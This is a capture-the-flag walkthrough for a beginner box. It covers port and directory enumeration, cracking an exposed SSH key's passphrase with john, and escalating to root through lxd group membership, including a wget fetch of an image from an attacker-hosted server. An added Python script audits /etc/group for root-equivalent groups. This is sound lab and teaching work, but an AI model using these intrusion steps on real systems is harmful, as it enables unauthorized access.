As this is a box more suitable for beginners, I'll be a bit more verbose in this writeup, enjoy :)
Nmap
Running
nmap -sC -sV -vv -oG nmap <MACHINE-IP>
Shows us 2 open ports:-
- 22 - SSH
- 80 - HTTP
Nmap command breakdown:-
- -sC -> Run default scripts
- -sV -> Enumerate service versions
- -vv -> Added verbosity
- -oG -> Output results in greppable format to a file called "nmap" in the current directory
Getting the user flag
The first thing to do is check out the website and interact with it.
As we can see, there are no user-controlled input fields, and there aren't many pages to check right off the bat.
At this stage it's worth checking each page's source code.
Immediately we discover a possible username in the home page source: "john".
Nothing else interesting pops up, so we'll enumerate directories with ffuf.
Running
ffuf -s -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://<MACHINE-IP>/FUZZ
Gives us 2 directories:-
- /uploads
- /secret
Let's check /uploads first.
There are 3 files, but only "dict.lst" matters to us, as it looks like a password list.
You can either copy and paste its contents into a file on your machine, or do it the faster way with wget.
wget http://<MACHINE-IP>/uploads/dict.lst
Now we check out /secret, and we find an SSH private key.
Use wget again to download it.
wget http://<MACHINE-IP>/secret/secretKey
Next, we'll use ssh2john to convert the key into a format John understands.
/usr/share/john/ssh2john.py secretKey > id_rsa
If you don't know where ssh2john is on your machine, you can find it by running this:
find / -name ssh2john.py 2>/dev/null
After that, we can use john with the password list we downloaded ("dict.lst") and the hash file ssh2john generated ("id_rsa") to crack the key's passphrase.
john id_rsa --wordlist=dict.lst
Ready to SSH?
Not yet: ssh refuses to use a private key that other users can read, so we first tighten the permissions on secretKey; then we can ssh into the machine as john and get the user flag.
chmod 600 secretKey
ssh john@<MACHINE-IP> -i secretKey
Getting the root flag
As the title suggests, getting the "root flag" means becoming root, i.e. escalating our privileges.
In most easy CTFs, this would be done by:-
- Running "sudo -l" to check what you can run with sudo, and then using GTFObins
- Checking the crontab at "/etc/crontab" to possibly "poison" some script
- Looking for other privesc vectors by running the LINPEAS script or pspy
However, none of these work on this machine.
After following this Linux privilege escalation checklist from HackTricks, we discover that the user "john" belongs to the "lxd" group.
And searching for "lxd" on HackTricks again, the first result we get is related to privilege escalation.
In our case, we'd be using method #2 for privesc.
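Membership in the lxd group is the whole root path here, which is why it is worth auditing on hosts you defend. Below is an added example (not from this writeup) that parses /etc/group formatted text and flags users in groups that are commonly root-equivalent; the sample file content is constructed, and the set of risky groups is an assumption to tune to your own baseline.

```python
import sys
from typing import Dict, List, Set

# Groups whose membership is commonly root-equivalent on Linux hosts. lxd is the
# vector on this box; the rest are assumptions to tune to your own baseline.
HIGH_RISK_GROUPS: Set[str] = {"lxd", "docker", "sudo", "wheel", "disk", "adm", "shadow"}

# Constructed sample of /etc/group content, not taken from the target machine.
SAMPLE_GROUP_FILE = """\
root:x:0:
adm:x:4:syslog
sudo:x:27:
lxd:x:110:john
docker:x:999:john
john:x:1000:
"""


def parse_group_file(text: str) -> Dict[str, List[str]]:
    """Map group name -> supplementary members, from /etc/group formatted text."""
    groups: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4:
            continue  # malformed line: skip it instead of aborting the audit
        name, _passwd, _gid, members = fields
        groups[name] = [m for m in members.split(",") if m]
    return groups


def find_risky_memberships(groups: Dict[str, List[str]],
                           risky: Set[str] = HIGH_RISK_GROUPS) -> Dict[str, List[str]]:
    """Return {user: sorted high-risk groups} for every user in a risky group."""
    findings: Dict[str, Set[str]] = {}
    for gname, members in groups.items():
        if gname in risky:
            for user in members:
                findings.setdefault(user, set()).add(gname)
    return {user: sorted(gs) for user, gs in sorted(findings.items())}


if __name__ == "__main__":
    # Pass a path (normally /etc/group) to audit a live host; default is the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GROUP_FILE
    for user, gs in find_risky_memberships(parse_group_file(text)).items():
        print(f"{user}: member of {', '.join(gs)}")
```

Run it against /etc/group on a host to see which accounts would get a free root path through lxd or docker; on the sample, john is flagged for both.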
We first clone the repo and run the included script, which outputs a tar file.
We'll also start a Python HTTP server to transfer the file to the target machine.
python3 -m http.server
Use wget to get the tar file onto the target machine:
wget http://<ATTACKER-IP>:8000/alpine<REST-OF-FILE-NAME>.tar.gz
And follow the rest of the steps from HackTricks.
Annnd we're root!
All that's left is to find root.txt and cat its contents.